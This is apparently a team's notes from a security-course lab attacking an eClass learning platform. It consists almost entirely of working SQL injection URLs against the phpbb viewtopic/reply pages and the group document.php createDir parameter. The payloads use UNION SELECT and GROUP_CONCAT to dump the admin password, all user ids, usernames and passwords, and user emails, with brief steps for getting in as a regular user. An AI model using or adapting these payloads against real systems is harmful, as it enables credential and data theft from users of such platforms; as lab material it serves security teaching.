http://the-intruders.csec.chatzi.org/modules/phpbb/viewtopic.php?topic=4%20AND%201=2)%20UNION%20(SELECT%201,password%20FROM%20eclass.user%20WHERE%20user_id%20=%201)%20--%20&forum=1
shows admins password

http://the-intruders.csec.chatzi.org/modules/phpbb/reply.php?topic=4%20AND%201=2)%20UNION%20(select%201,2,3,GROUP_CONCAT(user_id,username,password)%20from%20eclass.user)%20--%20%20&forum=1
shows user_idusernamepassword (concatenated, each user separated with comma)

http://the-intruders.csec.chatzi.org/modules/phpbb/viewtopic.php?topic=4%20AND%201=2)%20UNION%20(SELECT%201,GROUP_CONCAT(password)%20FROM%20eclass.user)%20--%20&forum=1
shows all passwords if GROUP_CONCAT(password)
shows all user_ids if GROUP_CONCAT(user_id) klp

http://the-intruders.csec.chatzi.org/modules/group/document.php?userGroupId=1&createDir=the-intruders%27%20and%20TRUE=FALSE%20union%20select%20GROUP_CONCAT(user_id,%27:%20%27,username,%20%27:%27,password%20SEPARATOR%20%27,%20%27)%20from%20eclass.user%20where%20username=%22drunkadmin%22%20--%20--
same with criss but a bit more informative


--------------------------------------------------------------
criss

http://the-intruders.csec.chatzi.org/modules/phpbb/viewtopic.php?topic=1%20AND%20FALSE=TRUE)%20UNION%20(SELECT%201,email%20FROM%20eclass.user%20where%20user_id=%207)%20--%20&forum=2

http://the-intruders.csec.chatzi.org/modules/group/document.php?userGroupId=1&createDir=the-intruders'%20and%20TRUE=FALSE%20union%20select%20email%20from%20eclass.user%20where%20username=%22drunkadmin%22%20--%20--
First of all we have to login as a regular user. After that we'll choose (Ομάδες Χρηστών - /modules/group) from the course that we want.
We are going to sign up to the first(for example) group, and execute the sql injection!
